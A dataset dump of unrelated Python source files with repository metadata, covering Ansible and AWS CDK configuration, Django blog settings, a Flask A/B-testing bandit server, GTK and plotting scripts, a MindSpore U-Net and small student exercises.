]
|
[
"geovanni.berdugo@gmail.com"
] |
geovanni.berdugo@gmail.com
|
00f502880899ebc4ff3c56f1b131f1ba2ae7846c
|
0e25538b2f24f1bc002b19a61391017c17667d3d
|
/xsharepoint/win_xspmanagedpath.py
|
527691433ba4407838d8a7cd0c78122a6cfd4090
|
[] |
no_license
|
trondhindenes/Ansible-Auto-Generated-Modules
|
725fae6ba9b0eef00c9fdc21179e2500dfd6725f
|
efa6ac8cd2b545116f24c1929936eb8cc5c8d337
|
refs/heads/master
| 2020-04-06T09:21:00.756651
| 2016-10-07T07:08:29
| 2016-10-07T07:08:29
| 36,883,816
| 12
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,584
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# <COPYRIGHT>
# <CODEGENMETA>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# this is a windows documentation stub. actual code lives in the .ps1
# file of the same name
DOCUMENTATION = '''
---
module: win_xspmanagedpath
version_added:
short_description: Generated from DSC module xsharepoint version 0.12.0.0 at 07.10.2016 02.56.36
description:
- This DSC module is used to deploy and configure SharePoint Server 2013, and convers a wide range of areas including web apps, service apps and farm configuration.
options:
Explicit:
description:
-
required: True
default:
aliases: []
HostHeader:
description:
-
required: True
default:
aliases: []
RelativeUrl:
description:
-
required: True
default:
aliases: []
WebAppUrl:
description:
-
required: True
default:
aliases: []
InstallAccount_username:
description:
-
required: False
default:
aliases: []
InstallAccount_password:
description:
-
required: False
default:
aliases: []
PsDscRunAsCredential_username:
description:
-
required: False
default:
aliases: []
PsDscRunAsCredential_password:
description:
-
required: False
default:
aliases: []
AutoInstallModule:
description:
- If true, the required dsc resource/module will be auto-installed using the Powershell package manager
required: False
default: false
aliases: []
choices:
- true
- false
AutoConfigureLcm:
description:
- If true, LCM will be auto-configured for directly invoking DSC resources (which is a one-time requirement for Ansible DSC modules)
required: False
default: false
aliases: []
choices:
- true
- false
|
[
"trond@hindenes.com"
] |
trond@hindenes.com
|
d454ee79742bbf7b555240e05ae0700d83559c75
|
29fad6273eb43fcbaff7460b2b68fea66d9ebc8c
|
/custom-vpc/custom_vpc/custom_vpc_stack.py
|
99ef9dd2bd53bf2c57edf14bd1ebc1b98829cff7
|
[] |
no_license
|
satishbr/cdk-demos
|
a3b2c7ca32551eb1c0264f8125f2ffc9413d00ff
|
14568c885322f561d548de0d1175f3b60ee87df0
|
refs/heads/master
| 2022-11-10T16:58:38.105403
| 2020-04-15T10:20:19
| 2020-04-15T10:20:19
| 275,331,921
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,025
|
py
|
from aws_cdk import (
aws_ec2 as ec2,
core
)
class CustomVpcStack(core.Stack):
def __init__(self, scope: core.Construct, id: str, **kwargs) -> None:
super().__init__(scope, id, **kwargs)
# The code that defines your stack goes here
# https://docs.aws.amazon.com/cdk/api/latest/python/aws_cdk.aws_ec2/Vpc.html
vpc = ec2.Vpc(
self, "MyVpc",
cidr="10.13.0.0/21",
max_azs=2,
nat_gateways=0,
subnet_configuration=[
ec2.SubnetConfiguration(name="public", cidr_mask=24, subnet_type=ec2.SubnetType.PUBLIC),
# ec2.SubnetConfiguration(name="private", cidr_mask=24, subnet_type=ec2.SubnetType.PRIVATE)
ec2.SubnetConfiguration(name="private", cidr_mask=24, subnet_type=ec2.SubnetType.ISOLATED)
]
)
# Tag all VPC Resources
core.Tag.add(vpc,key="Owner",value="KonStone",include_resource_types=[])
|
[
"13oct08@quantumfoam.uni.cc"
] |
13oct08@quantumfoam.uni.cc
|
258c7e7730f7dcfc58404705362466c414aa2af4
|
8b865eca2facf190369df4303fd6550c31614f72
|
/project04/bagInterface.py
|
49ca757766fdb7a64aa4d786bbe30b5e0f3d4fe9
|
[] |
no_license
|
Yamase31/cs112
|
16ba1732441e70065f2aded7542907ccb35e048e
|
199c5731b0bcbd475d8a8d2c9429eaebfbc1d180
|
refs/heads/main
| 2023-06-30T13:34:43.086674
| 2021-08-10T03:14:45
| 2021-08-10T03:14:45
| 394,503,671
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,340
|
py
|
"""
Author: James Lawson, Harry Pinkerton, Laurie Jones
File: baginterface.py
Speficitactions of the methods for all bag classes. Running this code will
not produce any results, but it shows the headers and docstrings of the methods
that MUST be included or supported in any bag class.
"""
class BagInterface(object):
"""Interface for all bag types."""
# Constructor
def __init__(self, sourceCollection = None):
"""Sets the initial state of self, which includes the
contents of sourceCollection, if it's present."""
self._size = 0
self._modCount = 0
if sourceCollection:
for item in sourceCollection:
self.add(item)
#pass
# Accessor methods
def isEmpty(self):
"""Returns True if len(self) == 0, or False otherwise."""
if len(self) == 0:
return True
else:
return False
def count(self, target):
"""Returns the number of a specific items in self."""
""" Returns the number of instances of item in self"""
itemCount = 0
for nextItem in self:
if nextItem == target:
itemCount += 1
return itemCount
def __len__(self):
"""-Returns the number of items in self."""
return self._size
def __str__(self):
"""Returns the string representation of self."""
return "{" + ",".join(map(str, self)) + "}"
def __iter__(self):
"""Supports iteration over a view of self."""
return None
def __add__(self, other):
"""Returns a new bag containing the contents
of self and other."""
result = ArrayBag(self)
for item in other:
result.add(item)
return result
def __eq__(self, other):
"""Returns True if self equals other,
or False otherwise."""
return False
# Mutator methods
def clear(self):
"""Makes self become empty."""
pass
def add(self, item):
"""Adds item to self."""
self._items = Node(item, self._items)
self._size += 1
pass
def remove(self, item):
"""Precondition: item is in self.
Raises: KeyError if item in not in self.
Postcondition: item is removed from self."""
pass
|
[
"noreply@github.com"
] |
Yamase31.noreply@github.com
|
0681e4919822450a149df6a9ebf09f9bd101b37f
|
2d837bca6989f61996e4e8e96635d722c97241c3
|
/core/gtk_table.py
|
eaae443c2d7d162408c56f74d7190bb125d20de0
|
[] |
no_license
|
gsy/gmusic
|
1485e11f4d63241f012b9e2ee27bbdb1ef563ce5
|
277e70c83a0ffcc00f2fc93933668dc16add11a8
|
refs/heads/master
| 2020-03-26T20:48:54.145376
| 2013-05-03T07:28:37
| 2013-05-03T07:28:37
| 9,724,424
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,189
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8
import pygtk
pygtk.require('2.0')
import gtk
class albumViewer:
def __init__(self):
self.window = gtk.Window(gtk.WINDOW_TOPLEVEL)
self.window.connect("destroy", lambda w:gtk.main_quit())
self.table = gtk.Table(1, 2, False)
self.table.set_row_spacings(10)
self.table.set_col_spacings(10)
image1 = gtk.Image()
image1.set_from_file("1.jpg")
self.table.attach(image1, 0, 1, 0, 1, gtk.FILL|gtk.EXPAND, gtk.FILL|gtk.EXPAND, 10, 10)
self.scaleImage(image1, "1.jpg")
image2 = gtk.Image()
image2.set_from_file("2.jpg")
self.table.attach(image2, 0, 1, 1, 2, gtk.FILL|gtk.EXPAND, gtk.FILL|gtk.EXPAND, 10, 10)
self.scaleImage(image2, "2.jpg")
self.window.add(self.table)
self.window.show_all()
def scaleImage(self, image, file):
pixbuf = gtk.gdk.pixbuf_new_from_file(file)
scaled_buf = pixbuf.scale_simple(200, 200, gtk.gdk.INTERP_BILINEAR)
image.set_from_pixbuf(scaled_buf)
def main(self):
gtk.main()
if __name__ == '__main__':
albumViewer().main()
|
[
"gtcxg@hotmail.com"
] |
gtcxg@hotmail.com
|
2407745c75d7ca85e8683e02f858075f868b447a
|
9b639327ffb1ee18e88904bc2e158d55205acc0b
|
/plot_multifreq_lic.py
|
cc2727d74c10908c58cfef293ca806223c30a714
|
[] |
no_license
|
guanyilun/gc_plots
|
6aebfef07013a2d7feb3975a7b76cf3dfc5fbd22
|
f4c1c68a3364fe77f949c6121c38448374314c9e
|
refs/heads/master
| 2023-06-25T06:04:17.530867
| 2021-07-19T21:55:17
| 2021-07-19T21:55:17
| 339,585,457
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,746
|
py
|
"""This script produces LIC plot based on multifrequency temperature
plot
"""
import argparse, os, os.path as op
import numpy as np
import matplotlib.pyplot as plt
from pixell import enmap, enplot, utils as u
from matplotlib import colors
from common import *
import lib
import plotstyle
# parser defined in common
parser.add_argument("-T", default=None)
parser.add_argument("-P", default=None)
parser.add_argument("--axis", action='store_true')
parser.add_argument("--figsize", default="(8,4)")
parser.add_argument("--texture", help='file to store texture', default='mf_texture.npy')
parser.add_argument('--force', action='store_true')
args = parser.parse_args()
if not op.exists(args.odir): os.makedirs(args.odir)
if args.figsize: figsize=eval(args.figsize)
else: figsize=None
# define box of interests
box = boxes[args.area]
# load a map for wcs only
imap = load_map(filedb['f090']['coadd'], box=box, fcode='f090')
# load two maps
tmap = np.load(args.T)
# start plotting
popts = {
'origin': 'lower',
}
# plots:
fig, ax = plt.subplots(1, 1, figsize=figsize, subplot_kw={'projection':imap.wcs})
if not args.axis:
ax.axis('off')
plt.tight_layout(h_pad=0.5)
else:
ax.tick_params(axis='x', colors='white', which='both', labelcolor='black')
ax.tick_params(axis='y', colors='white', which='both', labelcolor='black')
ax.set_aspect('equal')
for side in ['left','right','top','bottom']:
ax.spines[side].set_visible(True)
ax.spines[side].set_color('white')
plotstyle.setup_axis(ax, nticks=[10,5])
ax.set_ylabel("$b$")
ax.set_xlabel('$l$')
plt.tight_layout(h_pad=0.1)
# polarization angle plot
# reload imap to get the original resolution
# seed = enmap.rand_gauss(imap[0].shape, imap.wcs)
# seed = enmap.smooth_gauss(seed, 0.5*u.arcmin*u.fwhm)
seed = None
imap = enmap.smooth_gauss(imap, 5*u.arcmin*u.fwhm)
P = np.sum(imap[1:]**2,axis=0)**0.5
if not op.exists(args.texture) or args.force:
theta = lib.Bangle(imap[1], imap[2], toIAU=True)
# no need to add for LIC pi/2
texture = lib.LIC_texture(theta, length=0.1, seed=seed, contrast=True)
np.save(args.texture, texture)
else:
texture = np.load(args.texture)
# boost contrast
curve = lambda x: 1/(1+np.exp(-(x-0.5)))
# texture = curve(texture) # option to adjust contrast of lic texture
alpha = np.min([np.ones_like(texture), 1.2*(P/P.max())**0.7],axis=0)
textures = np.stack([np.ones_like(texture)*alpha]*3+[0.6*texture], axis=2)
ax.imshow(tmap, **popts)
ax.imshow(textures, origin='lower')
# watermark
ax.text(0.84, 0.05, "ACT Collaboration", fontsize=10, color='gray', transform=ax.transAxes, alpha=0.8)
ofile = op.join(args.odir, args.oname)
print("Writing:", ofile)
plt.savefig(ofile, bbox_inches='tight')
|
[
"zoom.aaron@gmail.com"
] |
zoom.aaron@gmail.com
|
6a61f6445c74967d9422d6b4739e394a79e11568
|
6eae4a2f7326238820bca29f9a2d99fb054f91e4
|
/src/blog/settings.py
|
5348a0f815fe878e1bf8eb108d2fa5a1e15a2eb0
|
[
"MIT"
] |
permissive
|
jach58/api-blog
|
88e69f80378be4ecfc110aa54363556eb3053c78
|
5e668289856669537f2d6dc7236ec4f1e566e765
|
refs/heads/master
| 2021-04-03T09:47:39.386947
| 2018-03-11T04:58:56
| 2018-03-11T04:58:56
| 124,724,713
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,473
|
py
|
"""
Django settings for blog project.
Generated by 'django-admin startproject' using Django 1.9.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# BASE_DIR = "/Users/jmitch/desktop/blog/src/"
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'sm@g)(fbwdh5wc*xe@j++m9rh^uza5se9a57c5ptwkg*b@ki0x'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
# third party
'crispy_forms',
'markdown_deux',
'pagedown',
'rest_framework',
# local apps
'comments',
'posts',
]
CRISPY_TEMPLATE_PACK = 'bootstrap3'
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
LOGIN_URL = "/login/"
ROOT_URLCONF = 'blog.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'blog.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
#'/var/www/static/',
]
STATIC_ROOT = os.path.join(os.path.dirname(BASE_DIR), "static_cdn")
MEDIA_URL = "/media/"
MEDIA_ROOT = os.path.join(os.path.dirname(BASE_DIR), "media_cdn")
REST_FRAMEWORK = {
'DEFAULT_RENDERER_CLASSES': (
'rest_framework.renderers.JSONRenderer',
'rest_framework.renderers.BrowsableAPIRenderer',
),
# 'DEFAULT_PARSER_CLASSES': (
# 'rest_framework.parsers.JSONParser',
# )
'DEFAULT_AUTHENTICATION_CLASSES':(
# 'rest_framework.authentication.SessionAuthentication',
'rest_framework_jwt.authentication.JSONWebTokenAuthentication',
# 'rest_framework.authentication.BasicAuthentication'
),
'DEFAULT_PERMISSION_CLASSES':(
'rest_framework.permissions.IsAuthenticated',
# 'rest_framework.permissions.IsAuthenticatedOrReadOnly',
)
}
"""
$ curl -X POST -d "username=square&password=square1234" http://localhost:8000/api/auth/token/
"""
|
[
"jach58@hotmail.com"
] |
jach58@hotmail.com
|
7d3b0358b02431cb03dbd79b5b445f66d3ffe27c
|
8e6e70f3c6e5aed96960a6de8983e72eafae1862
|
/wheelcms_valve/tests/conftest.py
|
5591a16354335efcbb43f8c77d1a730b58f56e24
|
[] |
no_license
|
wheelcms/wheelcms_valve
|
c7988c2fe89f85e978272ed319e7057553dd24e9
|
8ea19cb8eb0081857b120c0f9bf55c128ee5d471
|
refs/heads/master
| 2021-01-19T08:01:43.063297
| 2015-04-04T18:28:20
| 2015-04-04T18:28:20
| 9,416,780
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 139
|
py
|
from twotest.fixtures import client, django_client
from wheelcms_axle.tests.fixtures import root, localtyperegistry, localtemplateregistry
|
[
"github@in.m3r.nl"
] |
github@in.m3r.nl
|
7a1a17f7d564853eb7d0e2b10e90489f14279b8a
|
0c4b33d04cf7fb73b3752b03af89eeaf76b8a0d2
|
/第14章-网络编程/1.py
|
699170cf14d9fa720ccd1731412ecb2f52e1ece3
|
[] |
no_license
|
kingflyfly/python_study
|
3b3ab427d23174b61b8f14c223059cfa9f303219
|
8a63a7c11b408bbc11a2b636517beaa424b37725
|
refs/heads/master
| 2020-06-11T01:39:52.655730
| 2020-03-24T16:09:39
| 2020-03-24T16:09:39
| 193,817,757
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 144
|
py
|
a,b = {"yanzhe1":"yanzhe","shanshan":"shanshan1"}.items()
print(type(a))
if a == "yanzhe1":
print("ok")
else:print("fial")
print(a)
print(b)
|
[
"542001608@qq.com"
] |
542001608@qq.com
|
ecb1c8c9b5ecc3253e822b5e31639049244ed39d
|
0ad7476f82d662249d13527219c45916cc6fb063
|
/bayesian_AB/client_server_practice/server_starter.py
|
3687225b896a5015fb7e697403d26b5ee12a7524
|
[] |
no_license
|
duilee/ab_testing
|
87d40edb0836cd78bf0e75f41947510c3f598316
|
d4bb900da4cf84cd28e5fcb8d37a2b6481eb94d8
|
refs/heads/master
| 2023-07-19T04:46:32.052780
| 2023-07-06T11:30:12
| 2023-07-06T11:30:12
| 331,349,413
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,830
|
py
|
# From the course: Bayesin Machine Learning in Python: A/B Testing
# https://deeplearningcourses.com/c/bayesian-machine-learning-in-python-ab-testing
# https://www.udemy.com/bayesian-machine-learning-in-python-ab-testing
from __future__ import print_function, division
from builtins import range
# Note: you may need to update your version of future
# sudo pip install -U future
import numpy as np
from flask import Flask, jsonify, request
from scipy.stats import beta
# create an app
app = Flask(__name__)
# define bandits
# there's no "pull arm" here
# since that's technically now the user/client
class Bandit:
def __init__(self, name):
self.name = name
self.clks = 0
self.views = 0
def sample(self):
a = 1 + self.clks
b = 1 + self.views - self.clks
return np.random.beta(a, b)
def add_clicks(self):
self.clks += 1
def add_view(self):
self.views += 1
if self.views % 50 == 0:
print("%s: clks=%s, views=%s" % (self.name, self.clks, self.views))
# TODO - what else does the Bandit need to do?
# initialize bandits
banditA = Bandit('A')
banditB = Bandit('B')
@app.route('/get_ad')
def get_ad():
sampleA = banditA.sample()
sampleB = banditB.sample()
if sampleA > sampleB:
ad = 'A'
banditA.add_view()
return jsonify({'advertisement_id': ad})
else:
ad = 'B'
banditB.add_view()
return jsonify({'advertisement_id': ad})
@app.route('/click_ad', methods=['POST'])
def click_ad():
result = 'OK'
if request.form['advertisement_id'] == 'A':
# TODO
banditA.add_clicks()
elif request.form['advertisement_id'] == 'B':
# TODO
banditB.add_clicks()
else:
result = 'Invalid Input.'
# nothing to return really
return jsonify({'result': result})
if __name__ == '__main__':
app.run(host='127.0.0.1', port='8888')
|
[
"duilee@berkeley.edu"
] |
duilee@berkeley.edu
|
83bd32474d5fdd7943df61a2f550898f0e745c32
|
5b9035dbfe0750e9933728f9631ad7a183dd3429
|
/17/00/weakref.ref.callback.py
|
1e2d84ae969b05e9575767bcd18a17d0192a8745
|
[
"CC0-1.0"
] |
permissive
|
pylangstudy/201709
|
271efbd4f337d912d0ca958a621eb2a040091528
|
53d868786d7327a83bfa7f4149549c6f9855a6c6
|
refs/heads/master
| 2021-01-21T12:16:21.950493
| 2017-09-30T00:02:34
| 2017-09-30T00:02:34
| 102,058,300
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 609
|
py
|
import weakref
class ExpensiveObject(object):
def __del__(self): print('Deleting ... %s' % self)
def callback(reference): print('callback(', reference, ')')
obj = ExpensiveObject()
r = weakref.ref(obj, callback)
print('obj:', obj) # <__main__.ExpensiveObject object at 0xb710adac>
print('ref:', r) # <weakref at 0xb70cb414; to 'ExpensiveObject' at 0xb710adac>
print('r():', r()) # <__main__.ExpensiveObject object at 0xb710adac>
del obj
print('Deleted obj !')
print('r():', r()) #None
print('ref:', r) #<weakref at 0xb70cb414; dead>
print('obj:', obj) #NameError: name 'obj' is not defined
|
[
"pylangstudy@yahoo.co.jp"
] |
pylangstudy@yahoo.co.jp
|
447309d3a7c5cd11e434e9eebbca587f1745d7b5
|
04f5b7913f5802813ed5b9b894d9723a96893d29
|
/xonsh2/prompt/__init__.py
|
a6524670600a5456eef8be8b014b0213eefb254b
|
[
"BSD-2-Clause"
] |
permissive
|
anki-code/xonsh2
|
b0e52f01119622b383b37a27658c3615507ef6e7
|
bd96fcdce9319ab6b90c7d9ac47d2249b61144d0
|
refs/heads/master
| 2023-01-04T09:19:43.857637
| 2020-11-01T17:10:44
| 2020-11-01T17:10:44
| 309,102,477
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 857
|
py
|
# amalgamate exclude
import os as _os
if _os.getenv("XONSH_DEBUG", ""):
pass
else:
import sys as _sys
try:
from xonsh2.prompt import __amalgam__
cwd = __amalgam__
_sys.modules["xonsh2.prompt.cwd"] = __amalgam__
env = __amalgam__
_sys.modules["xonsh2.prompt.env"] = __amalgam__
gitstatus = __amalgam__
_sys.modules["xonsh2.prompt.gitstatus"] = __amalgam__
job = __amalgam__
_sys.modules["xonsh2.prompt.job"] = __amalgam__
times = __amalgam__
_sys.modules["xonsh2.prompt.times"] = __amalgam__
vc = __amalgam__
_sys.modules["xonsh2.prompt.vc"] = __amalgam__
base = __amalgam__
_sys.modules["xonsh2.prompt.base"] = __amalgam__
del __amalgam__
except ImportError:
pass
del _sys
del _os
# amalgamate end
|
[
"a"
] |
a
|
938319c0ec9bf23932b135e6b736177504f56448
|
444a9480bce2035565332d4d4654244c0b5cd47b
|
/research/cv/LearningToSeeInTheDark/src/unet_parts.py
|
98222051e28a37247b798b96c9df9180649f7d6c
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-proprietary-license"
] |
permissive
|
mindspore-ai/models
|
7ede9c6454e77e995e674628204e1c6e76bd7b27
|
eab643f51336dbf7d711f02d27e6516e5affee59
|
refs/heads/master
| 2023-07-20T01:49:34.614616
| 2023-07-17T11:43:18
| 2023-07-17T11:43:18
| 417,393,380
| 301
| 92
|
Apache-2.0
| 2023-05-17T11:22:28
| 2021-10-15T06:38:37
|
Python
|
UTF-8
|
Python
| false
| false
| 3,576
|
py
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Unet Components"""
import mindspore.nn as nn
import mindspore.ops.operations as F
from mindspore.ops import Maximum
from mindspore.ops import DepthToSpace as dts
from mindspore.common.initializer import TruncatedNormal
from mindspore.common.initializer import XavierUniform
import mindspore as ms
ms.set_seed(1212)
class LRelu(nn.Cell):
""" activation function """
def __init__(self):
super(LRelu, self).__init__()
self.max = Maximum()
def construct(self, x):
""" construct of lrelu activation """
return self.max(x * 0.2, x)
class DoubleConv(nn.Cell):
"""conv2d for two times with lrelu activation"""
def __init__(self, in_channels, out_channels, mid_channels=None):
super(DoubleConv, self).__init__()
if not mid_channels:
mid_channels = out_channels
self.kernel_init = XavierUniform()
self.double_conv = nn.SequentialCell(
[nn.Conv2d(in_channels, mid_channels, kernel_size=3, stride=1, pad_mode="same",
weight_init=self.kernel_init), LRelu(),
nn.Conv2d(mid_channels, out_channels, kernel_size=3, stride=1, pad_mode="same",
weight_init=self.kernel_init), LRelu()])
def construct(self, x):
""" construct of double conv2d """
return self.double_conv(x)
class Down(nn.Cell):
"""Downscaling with maxpool then double conv"""
def __init__(self, in_channels, out_channels):
super(Down, self).__init__()
self.maxpool_conv = nn.SequentialCell(
[nn.MaxPool2d(kernel_size=2, stride=2, pad_mode="same"),
DoubleConv(in_channels, out_channels)]
)
def construct(self, x):
""" construct of down cell """
return self.maxpool_conv(x)
class Up(nn.Cell):
"""Upscaling then double conv"""
def __init__(self, in_channels, out_channels):
super(Up, self).__init__()
self.concat = F.Concat(axis=1)
self.kernel_init = TruncatedNormal(0.02)
self.conv = DoubleConv(in_channels, out_channels)
self.up = nn.Conv2dTranspose(in_channels, in_channels // 2, kernel_size=2, stride=2,
pad_mode='same', weight_init=self.kernel_init)
def construct(self, x1, x2):
""" construct of up cell """
x1 = self.up(x1)
x = self.concat((x1, x2))
return self.conv(x)
class OutConv(nn.Cell):
"""trans data into RGB channels"""
def __init__(self, in_channels, out_channels):
super(OutConv, self).__init__()
self.kernel_init = XavierUniform()
self.conv = nn.Conv2d(in_channels, out_channels, kernel_size=1, pad_mode='same', weight_init=self.kernel_init)
self.DtS = dts(block_size=2)
def construct(self, x):
""" construct of last conv """
x = self.conv(x)
x = self.DtS(x)
return x
|
[
"chenhaozhe1@huawei.com"
] |
chenhaozhe1@huawei.com
|
4d5abe700c5d48838af29b5be52a1e7aa59eee03
|
ba5c4c07d11e6f529ba7184ef3fe1ab0d61a19e6
|
/examples/btn_start.py
|
6b1c2aec64fb2f2ea08c9cf654e1fd702b12c056
|
[] |
no_license
|
slightlynybbled/tkmats
|
920033adef46f41b67e99f3e7ba1b13a1c7ff4c5
|
73e03e519287b09436f547a532fbd33c1ce05cca
|
refs/heads/master
| 2020-04-30T17:58:19.036996
| 2020-02-19T03:44:33
| 2020-02-19T03:44:33
| 176,996,416
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,287
|
py
|
import logging
from random import random, choice
from time import sleep
import tkinter as tk
from mats import Test
from mats import TestSequence
from tkmats import TkMatsFrame
# The CommunicationTest class shows the minimum test structure that might
# be reasonably be implemented. Only the `execute()` method is implemented.
class CommunicationTest(Test):
def __init__(self, loglevel=logging.INFO):
super().__init__(moniker='communications test',
pass_if=True,
loglevel=loglevel)
# overriding the execute method
def execute(self, is_passing):
# a normal test would set `test_is_passing` based on real conditions, we
# are implementing a random value here simply for illustrative purposes
passing = choice([True] * 3 + [False])
# should return a (key, value) which are the results of the test
return passing
# The PumpFlowTest implements the `setup' and `teardown` methods as well
# in order to demonstrate what that may look like
class PumpFlowTest(Test):
def __init__(self, loglevel=logging.INFO):
super().__init__(moniker='pump flow test',
min_value=5.6, max_value=6.4,
loglevel=loglevel)
def setup(self, is_passing):
# setting the speed of the pump might be something done in the setup,
# including the wait time to speed up the pump, which we will
# simulate with a 2s sleep
sleep(2.0)
def execute(self, is_passing):
# simulate long-running process, such as
# several flow measurement/averaging cycles
sleep(0.1)
flow = 5.5 + random()
# should return a (key, value) tuple which are the results of the test
return flow
def teardown(self, is_passing):
# again, simulating another long-running process...
sleep(0.1)
if __name__ == '__main__':
logging.basicConfig(level=logging.DEBUG)
# create the sequence of test objects
sequence = [CommunicationTest(), PumpFlowTest()]
ts = TestSequence(sequence=sequence, auto_run=False, loglevel=logging.DEBUG)
window = tk.Tk()
tkate_frame = TkMatsFrame(window, ts, vertical=True)
tkate_frame.grid()
window.mainloop()
|
[
"slightlynybbled@gmail.com"
] |
slightlynybbled@gmail.com
|
ab061fb9bc9e9a17133655c37bf8f7f9b529bc18
|
076dd40fcb9283a8e3d66dd3fa3745826b887378
|
/kashgari/embeddings/__init__.py
|
066291c4f5f8347689c72990be315e70c02a4db2
|
[
"MIT"
] |
permissive
|
gongqingyi-github/Kashgari
|
54bb53bb618b9791433a61a7fd5e73f4951873f1
|
efc9510ed53f5bb78183e66d96d57a55cc290a91
|
refs/heads/master
| 2020-04-18T16:51:22.609685
| 2019-01-26T02:26:54
| 2019-01-26T02:26:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 442
|
py
|
# encoding: utf-8
"""
@author: BrikerMan
@contact: eliyar917@gmail.com
@blog: https://eliyar.biz
@version: 1.0
@license: Apache Licence
@file: __init__.py.py
@time: 2019-01-19 09:57
"""
from .embeddings import BERTEmbedding
from .embeddings import BaseEmbedding
from .embeddings import CustomEmbedding
from .embeddings import WordEmbeddings
from .embeddings import get_embedding_by_conf
if __name__ == "__main__":
print("Hello world")
|
[
"eliyar917@gmail.com"
] |
eliyar917@gmail.com
|
98b29e78f354f896f27d9785a107e5bae46cb53a
|
8f70ad12af7eba07efa52eb29b8f99ed3900dbb9
|
/AGTGA data/AGTGA/posifon/posifon 2/TestSuite/TestSuite/TestCase01.py
|
038064c093137ade8a3097f9ca295bbb0ed13f50
|
[] |
no_license
|
Georgesarkis/AGTGARowData
|
768952dc03dc342bcbe0902bf2fb1720853d0e14
|
e1faa7dc820b051a73b0844eac545e597a97da16
|
refs/heads/master
| 2022-10-01T17:06:04.758751
| 2020-06-05T07:25:41
| 2020-06-05T07:25:41
| 267,772,437
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,717
|
py
|
import time
from appium import webdriver
from appium.webdriver.common.touch_action import TouchAction
from TestSuite.TestSuiteHelper import ElementFinder
port = 'http://localhost:4723/wd/hub'
